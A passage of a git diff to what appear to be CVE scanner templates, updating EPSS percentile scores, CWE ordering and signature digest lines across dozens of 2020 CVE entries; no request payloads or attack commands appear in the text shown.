cpe:2.3:a:goodlayers:good_learning_management_system:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-27735.yaml b/http/cves/2020/CVE-2020-27735.yaml index fc0a9d1386..4b30842619 100644 --- a/http/cves/2020/CVE-2020-27735.yaml +++ b/http/cves/2020/CVE-2020-27735.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-27735 cwe-id: CWE-79 epss-score: 0.00216 - epss-percentile: 0.59457 + epss-percentile: 0.5949 cpe: cpe:2.3:a:wftpserver:wing_ftp_server:6.4.4:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-27866.yaml b/http/cves/2020/CVE-2020-27866.yaml index b7258c81e6..2eac030d73 100644 --- a/http/cves/2020/CVE-2020-27866.yaml +++ b/http/cves/2020/CVE-2020-27866.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-27866 cwe-id: CWE-288,CWE-287 epss-score: 0.00433 - epss-percentile: 0.71758 + epss-percentile: 0.71782 cpe: cpe:2.3:o:netgear:ac2100_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-27982.yaml b/http/cves/2020/CVE-2020-27982.yaml index c28458bd4e..dadbadd881 100644 --- a/http/cves/2020/CVE-2020-27982.yaml +++ b/http/cves/2020/CVE-2020-27982.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-27982 cwe-id: CWE-79 epss-score: 0.00178 - epss-percentile: 0.54825 + epss-percentile: 0.54851 cpe: cpe:2.3:a:icewarp:mail_server:11.4.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-27986.yaml b/http/cves/2020/CVE-2020-27986.yaml index 06797dbc24..f6fe6ff61d 100644 --- a/http/cves/2020/CVE-2020-27986.yaml +++ b/http/cves/2020/CVE-2020-27986.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-27986 cwe-id: CWE-306 epss-score: 0.10231 - epss-percentile: 0.94317 + epss-percentile: 0.94321 cpe: cpe:2.3:a:sonarsource:sonarqube:8.4.2.36762:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-28185.yaml b/http/cves/2020/CVE-2020-28185.yaml index 327260e37b..2db400cc47 100644 --- a/http/cves/2020/CVE-2020-28185.yaml +++ b/http/cves/2020/CVE-2020-28185.yaml @@ -18,7 +18,7 @@ info: cvss-score: 5.3 cve-id: CVE-2020-28185 epss-score: 0.00454 - epss-percentile: 0.72434 + epss-percentile: 0.72459 cpe: cpe:2.3:o:terra-master:tos:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-28208.yaml b/http/cves/2020/CVE-2020-28208.yaml index a5c00f0f04..c4b8172b33 100644 --- a/http/cves/2020/CVE-2020-28208.yaml +++ b/http/cves/2020/CVE-2020-28208.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-28208 cwe-id: CWE-203 epss-score: 0.00847 - epss-percentile: 0.80287 + epss-percentile: 0.80301 cpe: cpe:2.3:a:rocket.chat:rocket.chat:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-28351.yaml b/http/cves/2020/CVE-2020-28351.yaml index 08dd3bd175..7b5eeba89f 100644 --- a/http/cves/2020/CVE-2020-28351.yaml +++ b/http/cves/2020/CVE-2020-28351.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-28351 cwe-id: CWE-79 epss-score: 0.0036 - epss-percentile: 0.69129 + epss-percentile: 0.69155 cpe: cpe:2.3:o:mitel:shoretel_firmware:19.46.1802.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-28976.yaml b/http/cves/2020/CVE-2020-28976.yaml index 508009459e..2111157524 100644 --- a/http/cves/2020/CVE-2020-28976.yaml +++ b/http/cves/2020/CVE-2020-28976.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-28976 cwe-id: CWE-918 epss-score: 0.00616 - epss-percentile: 0.76452 + epss-percentile: 0.76472 cpe: cpe:2.3:a:canto:canto:1.3.0:*:*:*:*:wordpress:*:* metadata: max-request: 3 diff --git a/http/cves/2020/CVE-2020-29164.yaml b/http/cves/2020/CVE-2020-29164.yaml index d629d4c578..f106a15ffe 100644 --- a/http/cves/2020/CVE-2020-29164.yaml +++ b/http/cves/2020/CVE-2020-29164.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-29164 cwe-id: CWE-79 epss-score: 0.00205 - epss-percentile: 0.58281 + epss-percentile: 0.5831 cpe: cpe:2.3:a:rainbowfishsoftware:pacsone_server:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-29227.yaml b/http/cves/2020/CVE-2020-29227.yaml index 58ec4fd106..2660045be1 100644 --- a/http/cves/2020/CVE-2020-29227.yaml +++ b/http/cves/2020/CVE-2020-29227.yaml @@ -16,7 +16,7 @@ info: cvss-score: 9.8 cve-id: CVE-2020-29227 epss-score: 0.00556 - epss-percentile: 0.75062 + epss-percentile: 0.75085 cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-29284.yaml b/http/cves/2020/CVE-2020-29284.yaml index d2f211162f..5dd05423b8 100644 --- a/http/cves/2020/CVE-2020-29284.yaml +++ b/http/cves/2020/CVE-2020-29284.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-29284 cwe-id: CWE-89 epss-score: 0.04855 - epss-percentile: 0.91854 + epss-percentile: 0.91864 cpe: cpe:2.3:a:multi_restaurant_table_reservation_system_project:multi_restaurant_table_reservation_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-29395.yaml b/http/cves/2020/CVE-2020-29395.yaml index ade76f98a8..d3d46c926c 100644 --- a/http/cves/2020/CVE-2020-29395.yaml +++ b/http/cves/2020/CVE-2020-29395.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-29395 cwe-id: CWE-79 epss-score: 0.05489 - epss-percentile: 0.92364 + epss-percentile: 0.92371 cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-29453.yaml b/http/cves/2020/CVE-2020-29453.yaml index 081d26aece..d27a4462da 100644 --- a/http/cves/2020/CVE-2020-29453.yaml +++ b/http/cves/2020/CVE-2020-29453.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2020-29453 cwe-id: CWE-22 epss-score: 0.01279 - epss-percentile: 0.84222 + epss-percentile: 0.84231 cpe: cpe:2.3:a:atlassian:data_center:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-29597.yaml b/http/cves/2020/CVE-2020-29597.yaml index 84b73c4f08..9bc5e18a1f 100644 --- a/http/cves/2020/CVE-2020-29597.yaml +++ b/http/cves/2020/CVE-2020-29597.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-29597 cwe-id: CWE-434 epss-score: 0.83778 - epss-percentile: 0.98112 + epss-percentile: 0.98114 cpe: cpe:2.3:a:incomcms_project:incomcms:2.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-3452.yaml b/http/cves/2020/CVE-2020-3452.yaml index d85f18a5dc..1a7e24034b 100644 --- a/http/cves/2020/CVE-2020-3452.yaml +++ b/http/cves/2020/CVE-2020-3452.yaml @@ -20,7 +20,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-3452 - cwe-id: CWE-20,CWE-22 + cwe-id: CWE-22,CWE-20 epss-score: 0.97541 epss-percentile: 0.99992 cpe: cpe:2.3:o:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:* @@ -42,4 +42,5 @@ http: - "INTERNAL_PASSWORD_ENABLED" - "CONF_VIRTUAL_KEYBOARD" condition: and -# digest: 4a0a0047304502203c8f0048653b48628a9048e0b56eec876dee7a0d62c6501887c93a8d4f244771022100a50cde8178ce1f561a54d1344ac419f51f148bf7a5efade02fbecd4921c1c5d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502203c8f0048653b48628a9048e0b56eec876dee7a0d62c6501887c93a8d4f244771022100a50cde8178ce1f561a54d1344ac419f51f148bf7a5efade02fbecd4921c1c5d1:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-35234.yaml b/http/cves/2020/CVE-2020-35234.yaml index 480764de11..42c7a516ca 100644 --- a/http/cves/2020/CVE-2020-35234.yaml +++ b/http/cves/2020/CVE-2020-35234.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2020-35234 cwe-id: CWE-532 epss-score: 0.38965 - epss-percentile: 0.96816 + epss-percentile: 0.96819 cpe: cpe:2.3:a:wp-ecommerce:easy_wp_smtp:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-35338.yaml b/http/cves/2020/CVE-2020-35338.yaml index 55ac812c6e..c8d036c3d0 100644 --- a/http/cves/2020/CVE-2020-35338.yaml +++ b/http/cves/2020/CVE-2020-35338.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-35338 cwe-id: CWE-798 epss-score: 0.09782 - epss-percentile: 0.94184 + epss-percentile: 0.94188 cpe: cpe:2.3:a:mobileviewpoint:wireless_multiplex_terminal_playout_server:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-35476.yaml b/http/cves/2020/CVE-2020-35476.yaml index feb1fa4097..19f62c341c 100644 --- a/http/cves/2020/CVE-2020-35476.yaml +++ b/http/cves/2020/CVE-2020-35476.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-35476 cwe-id: CWE-78 epss-score: 0.96079 - epss-percentile: 0.99316 + epss-percentile: 0.99317 cpe: cpe:2.3:a:opentsdb:opentsdb:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-35489.yaml b/http/cves/2020/CVE-2020-35489.yaml index 501037dcaa..77b8cd2feb 100644 --- a/http/cves/2020/CVE-2020-35489.yaml +++ b/http/cves/2020/CVE-2020-35489.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-35489 cwe-id: CWE-434 epss-score: 0.91898 - epss-percentile: 0.9862 + epss-percentile: 0.98621 cpe: cpe:2.3:a:rocklobster:contact_form_7:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-35580.yaml b/http/cves/2020/CVE-2020-35580.yaml index 85bf63c3a9..cdb5c5dd55 100644 --- a/http/cves/2020/CVE-2020-35580.yaml +++ b/http/cves/2020/CVE-2020-35580.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-35580 cwe-id: CWE-22 epss-score: 0.02597 - epss-percentile: 0.89121 + epss-percentile: 0.89127 cpe: cpe:2.3:a:searchblox:searchblox:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-35598.yaml b/http/cves/2020/CVE-2020-35598.yaml index 59d44eb4b2..09c56cc8dc 100644 --- a/http/cves/2020/CVE-2020-35598.yaml +++ b/http/cves/2020/CVE-2020-35598.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-35598 cwe-id: CWE-22 epss-score: 0.11926 - epss-percentile: 0.94725 + epss-percentile: 0.94727 cpe: cpe:2.3:a:advanced_comment_system_project:advanced_comment_system:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-35713.yaml b/http/cves/2020/CVE-2020-35713.yaml index 82e240351d..8473cbeffa 100644 --- a/http/cves/2020/CVE-2020-35713.yaml +++ b/http/cves/2020/CVE-2020-35713.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-35713 cwe-id: CWE-78 epss-score: 0.9714 - epss-percentile: 0.9972 + epss-percentile: 0.99721 cpe: cpe:2.3:o:linksys:re6500_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-35729.yaml b/http/cves/2020/CVE-2020-35729.yaml index b983f3a5e4..5201478f47 100644 --- a/http/cves/2020/CVE-2020-35729.yaml +++ b/http/cves/2020/CVE-2020-35729.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-35729 cwe-id: CWE-78 epss-score: 0.95886 - epss-percentile: 0.99268 + epss-percentile: 0.99269 cpe: cpe:2.3:a:klogserver:klog_server:2.4.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-35736.yaml b/http/cves/2020/CVE-2020-35736.yaml index d2c3a4dfaa..4cbfbe5de4 100644 --- a/http/cves/2020/CVE-2020-35736.yaml +++ b/http/cves/2020/CVE-2020-35736.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-35736 cwe-id: CWE-22 epss-score: 0.01291 - epss-percentile: 0.84343 + epss-percentile: 0.84351 cpe: cpe:2.3:a:liftoffsoftware:gateone:1.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-35749.yaml b/http/cves/2020/CVE-2020-35749.yaml index 998a7a69bd..9f48f5fe89 100644 --- a/http/cves/2020/CVE-2020-35749.yaml +++ b/http/cves/2020/CVE-2020-35749.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-35749 cwe-id: CWE-22 epss-score: 0.017 - epss-percentile: 0.86358 + epss-percentile: 0.86362 cpe: cpe:2.3:a:presstigers:simple_board_job:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-35774.yaml b/http/cves/2020/CVE-2020-35774.yaml index f335e0b741..0ebf8e9010 100644 --- a/http/cves/2020/CVE-2020-35774.yaml +++ b/http/cves/2020/CVE-2020-35774.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-35774 cwe-id: CWE-79 epss-score: 0.97219 - epss-percentile: 0.99766 + epss-percentile: 0.99767 cpe: cpe:2.3:a:twitter:twitter-server:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-3580.yaml b/http/cves/2020/CVE-2020-3580.yaml index 16d3d369fb..b40bc0fc52 100644 --- a/http/cves/2020/CVE-2020-3580.yaml +++ b/http/cves/2020/CVE-2020-3580.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-3580 cwe-id: CWE-79 epss-score: 0.97048 - epss-percentile: 0.9967 + epss-percentile: 0.99671 cpe: cpe:2.3:o:cisco:firepower_threat_defense:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-35846.yaml b/http/cves/2020/CVE-2020-35846.yaml index ca9527361f..8226da9ac4 100644 --- a/http/cves/2020/CVE-2020-35846.yaml +++ b/http/cves/2020/CVE-2020-35846.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-35846 cwe-id: CWE-89 epss-score: 0.82538 - epss-percentile: 0.9805 + epss-percentile: 0.98051 cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-35847.yaml b/http/cves/2020/CVE-2020-35847.yaml index fb7d8993a3..134d844e0b 100644 --- a/http/cves/2020/CVE-2020-35847.yaml +++ b/http/cves/2020/CVE-2020-35847.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-35847 cwe-id: CWE-89 epss-score: 0.74725 - epss-percentile: 0.97799 + epss-percentile: 0.97802 cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-35848.yaml b/http/cves/2020/CVE-2020-35848.yaml index 69b315dd8c..f920b42c53 100644 --- a/http/cves/2020/CVE-2020-35848.yaml +++ b/http/cves/2020/CVE-2020-35848.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-35848 cwe-id: CWE-89 epss-score: 0.71273 - epss-percentile: 0.97701 + epss-percentile: 0.97702 cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-35951.yaml b/http/cves/2020/CVE-2020-35951.yaml index df3b3a7d45..a798ee34ee 100644 --- a/http/cves/2020/CVE-2020-35951.yaml +++ b/http/cves/2020/CVE-2020-35951.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-35951 cwe-id: CWE-306 epss-score: 0.00174 - epss-percentile: 0.54452 + epss-percentile: 0.54474 cpe: cpe:2.3:a:expresstech:quiz_and_survey_master:*:*:*:*:*:wordpress:*:* metadata: max-request: 4 diff --git a/http/cves/2020/CVE-2020-35984.yaml b/http/cves/2020/CVE-2020-35984.yaml index 715e630f35..33249a5fe4 100644 --- a/http/cves/2020/CVE-2020-35984.yaml +++ b/http/cves/2020/CVE-2020-35984.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-35984 cwe-id: CWE-79 epss-score: 0.00127 - epss-percentile: 0.47065 + epss-percentile: 0.47076 cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2020/CVE-2020-35985.yaml b/http/cves/2020/CVE-2020-35985.yaml index db810d2fcc..0b04fbc52d 100644 --- a/http/cves/2020/CVE-2020-35985.yaml +++ b/http/cves/2020/CVE-2020-35985.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-35985 cwe-id: CWE-79 epss-score: 0.00127 - epss-percentile: 0.47065 + epss-percentile: 0.47076 cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-35986.yaml b/http/cves/2020/CVE-2020-35986.yaml index d1248c131f..7b4f31497b 100644 --- a/http/cves/2020/CVE-2020-35986.yaml +++ b/http/cves/2020/CVE-2020-35986.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-35986 cwe-id: CWE-79 epss-score: 0.00127 - epss-percentile: 0.47065 + epss-percentile: 0.47076 cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2020/CVE-2020-35987.yaml b/http/cves/2020/CVE-2020-35987.yaml index 82c99b8197..7bcb8576cf 100644 --- a/http/cves/2020/CVE-2020-35987.yaml +++ b/http/cves/2020/CVE-2020-35987.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-35987 cwe-id: CWE-79 epss-score: 0.00127 - epss-percentile: 0.47065 + epss-percentile: 0.47076 cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-36112.yaml b/http/cves/2020/CVE-2020-36112.yaml index e991e524d8..84994f8064 100644 --- a/http/cves/2020/CVE-2020-36112.yaml +++ b/http/cves/2020/CVE-2020-36112.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-36112 cwe-id: CWE-89 epss-score: 0.4379 - epss-percentile: 0.96953 + epss-percentile: 0.96959 cpe: cpe:2.3:a:cse_bookstore_project:cse_bookstore:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-36289.yaml b/http/cves/2020/CVE-2020-36289.yaml index f4511bc728..cae09ed905 100644 --- a/http/cves/2020/CVE-2020-36289.yaml +++ b/http/cves/2020/CVE-2020-36289.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-36289 cwe-id: CWE-863 epss-score: 0.92682 - epss-percentile: 0.98719 + epss-percentile: 0.9872 cpe: cpe:2.3:a:atlassian:data_center:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-36365.yaml b/http/cves/2020/CVE-2020-36365.yaml index dd8c0ab33c..8ddb74da2d 100644 --- a/http/cves/2020/CVE-2020-36365.yaml +++ b/http/cves/2020/CVE-2020-36365.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-36365 cwe-id: CWE-601 epss-score: 0.00331 - epss-percentile: 0.67883 + epss-percentile: 0.67909 cpe: cpe:2.3:a:smartstore:smartstorenet:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-36510.yaml b/http/cves/2020/CVE-2020-36510.yaml index 923779354e..fff66ae98f 100644 --- a/http/cves/2020/CVE-2020-36510.yaml +++ b/http/cves/2020/CVE-2020-36510.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-36510 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42946 + epss-percentile: 0.42969 cpe: cpe:2.3:a:codetipi:15zine:*:*:*:*:*:wordpress:*:* metadata: verified: "false" diff --git a/http/cves/2020/CVE-2020-4463.yaml b/http/cves/2020/CVE-2020-4463.yaml index dd3de06230..643cc4ed19 100644 --- a/http/cves/2020/CVE-2020-4463.yaml +++ b/http/cves/2020/CVE-2020-4463.yaml @@ -23,7 +23,7 @@ info: cve-id: CVE-2020-4463 cwe-id: CWE-611 epss-score: 0.6611 - epss-percentile: 0.97558 + epss-percentile: 0.97562 cpe: cpe:2.3:a:ibm:maximo_asset_management:7.6.0.1:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-5191.yaml b/http/cves/2020/CVE-2020-5191.yaml index e8a9b302aa..b5148408f6 100644 --- a/http/cves/2020/CVE-2020-5191.yaml +++ b/http/cves/2020/CVE-2020-5191.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-5191 cwe-id: CWE-79 epss-score: 0.00345 - epss-percentile: 0.68498 + epss-percentile: 0.68524 cpe: cpe:2.3:a:phpgurukul:hospital_management_system_in_php:4.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-5192.yaml b/http/cves/2020/CVE-2020-5192.yaml index 4dad2c7ee0..a0ff60c89c 100644 --- a/http/cves/2020/CVE-2020-5192.yaml +++ b/http/cves/2020/CVE-2020-5192.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-5192 cwe-id: CWE-89 epss-score: 0.31381 - epss-percentile: 0.96479 + epss-percentile: 0.9648 cpe: cpe:2.3:a:phpgurukul:hospital_management_system_in_php:4.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-5284.yaml b/http/cves/2020/CVE-2020-5284.yaml index 67f6d9597d..8db50d0658 100644 --- a/http/cves/2020/CVE-2020-5284.yaml +++ b/http/cves/2020/CVE-2020-5284.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2020-5284 cwe-id: CWE-22,CWE-23 epss-score: 0.00152 - epss-percentile: 0.51288 + epss-percentile: 0.51315 cpe: cpe:2.3:a:zeit:next.js:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-5307.yaml b/http/cves/2020/CVE-2020-5307.yaml index eb2865d896..9a19e0e764 100644 --- a/http/cves/2020/CVE-2020-5307.yaml +++ b/http/cves/2020/CVE-2020-5307.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-5307 cwe-id: CWE-89 epss-score: 0.02037 - epss-percentile: 0.87718 + epss-percentile: 0.87724 cpe: cpe:2.3:a:phpgurukul_dairy_farm_shop_management_system_project:phpgurukul_dairy_farm_shop_management_system:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-5405.yaml b/http/cves/2020/CVE-2020-5405.yaml index 2ecc9c2911..4af2f98032 100644 --- a/http/cves/2020/CVE-2020-5405.yaml +++ b/http/cves/2020/CVE-2020-5405.yaml @@ -14,9 +14,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N cvss-score: 6.5 cve-id: CVE-2020-5405 - cwe-id: CWE-22,CWE-23 + cwe-id: CWE-23,CWE-22 epss-score: 0.00258 - epss-percentile: 0.63348 + epss-percentile: 0.63381 cpe: cpe:2.3:a:vmware:spring_cloud_config:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022024bfee80b4a813fdfaad6e9372701cea8f2664bab3b38cbf4b70600abd3c1a35022100c72ded856593055fdd190e34880e2193f1d7b44b87bd3b90c007411211938dc5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022024bfee80b4a813fdfaad6e9372701cea8f2664bab3b38cbf4b70600abd3c1a35022100c72ded856593055fdd190e34880e2193f1d7b44b87bd3b90c007411211938dc5:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-5410.yaml b/http/cves/2020/CVE-2020-5410.yaml index 430d853268..de91bf7781 100644 --- a/http/cves/2020/CVE-2020-5410.yaml +++ b/http/cves/2020/CVE-2020-5410.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2020-5410 cwe-id: CWE-22,CWE-23 epss-score: 0.96802 - epss-percentile: 0.99563 + epss-percentile: 0.99564 cpe: cpe:2.3:a:vmware:spring_cloud_config:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-5412.yaml b/http/cves/2020/CVE-2020-5412.yaml index 48f34b4fc6..64f15c441f 100644 --- a/http/cves/2020/CVE-2020-5412.yaml +++ b/http/cves/2020/CVE-2020-5412.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2020-5412 cwe-id: CWE-610,CWE-441 epss-score: 0.39161 - epss-percentile: 0.96834 + epss-percentile: 0.96836 cpe: cpe:2.3:a:vmware:spring_cloud_netflix:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-5775.yaml b/http/cves/2020/CVE-2020-5775.yaml index 4162cee887..caf95e138f 100644 --- a/http/cves/2020/CVE-2020-5775.yaml +++ b/http/cves/2020/CVE-2020-5775.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2020-5775 cwe-id: CWE-918 epss-score: 0.00194 - epss-percentile: 0.57002 + epss-percentile: 0.5703 cpe: cpe:2.3:a:instructure:canvas_learning_management_service:2020-07-29:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-5776.yaml b/http/cves/2020/CVE-2020-5776.yaml index 55b66a9225..eee30db19d 100644 --- a/http/cves/2020/CVE-2020-5776.yaml +++ b/http/cves/2020/CVE-2020-5776.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2020-5776 cwe-id: CWE-352 epss-score: 0.56617 - epss-percentile: 0.97315 + epss-percentile: 0.97316 cpe: cpe:2.3:a:magmi_project:magmi:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2020/CVE-2020-5777.yaml b/http/cves/2020/CVE-2020-5777.yaml index 8fd2ff1f60..fe6392db65 100644 --- a/http/cves/2020/CVE-2020-5777.yaml +++ b/http/cves/2020/CVE-2020-5777.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-5777 cwe-id: CWE-287 epss-score: 0.02889 - epss-percentile: 0.89644 + epss-percentile: 0.8965 cpe: cpe:2.3:a:magmi_project:magmi:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-6171.yaml b/http/cves/2020/CVE-2020-6171.yaml index e8fed63804..e724a18e55 100644 --- a/http/cves/2020/CVE-2020-6171.yaml +++ b/http/cves/2020/CVE-2020-6171.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2020-6171 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.48508 + epss-percentile: 0.48521 cpe: cpe:2.3:a:communilink:clink_office:2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-6308.yaml b/http/cves/2020/CVE-2020-6308.yaml index ea70a35ded..be6139e288 100644 --- a/http/cves/2020/CVE-2020-6308.yaml +++ b/http/cves/2020/CVE-2020-6308.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-6308 cwe-id: CWE-918 epss-score: 0.00306 - epss-percentile: 0.66504 + epss-percentile: 0.66537 cpe: cpe:2.3:a:sap:businessobjects_business_intelligence_platform:4.1:-:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-6637.yaml b/http/cves/2020/CVE-2020-6637.yaml index 3d3a797230..ba4ed59fe0 100644 --- a/http/cves/2020/CVE-2020-6637.yaml +++ b/http/cves/2020/CVE-2020-6637.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2020-6637 cwe-id: CWE-89 epss-score: 0.02003 - epss-percentile: 0.87606 + epss-percentile: 0.87613 cpe: cpe:2.3:a:os4ed:opensis:7.3:*:*:*:community:*:*:* metadata: max-request: 3 diff --git a/http/cves/2020/CVE-2020-6950.yaml b/http/cves/2020/CVE-2020-6950.yaml index 6460964ade..81d4c17494 100644 --- a/http/cves/2020/CVE-2020-6950.yaml +++ b/http/cves/2020/CVE-2020-6950.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2020-6950 cwe-id: CWE-22 epss-score: 0.0447 - epss-percentile: 0.91482 + epss-percentile: 0.91492 cpe: cpe:2.3:a:eclipse:mojarra:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-7107.yaml b/http/cves/2020/CVE-2020-7107.yaml index 69b3ae8eaf..1de47a3f3d 100644 --- a/http/cves/2020/CVE-2020-7107.yaml +++ b/http/cves/2020/CVE-2020-7107.yaml 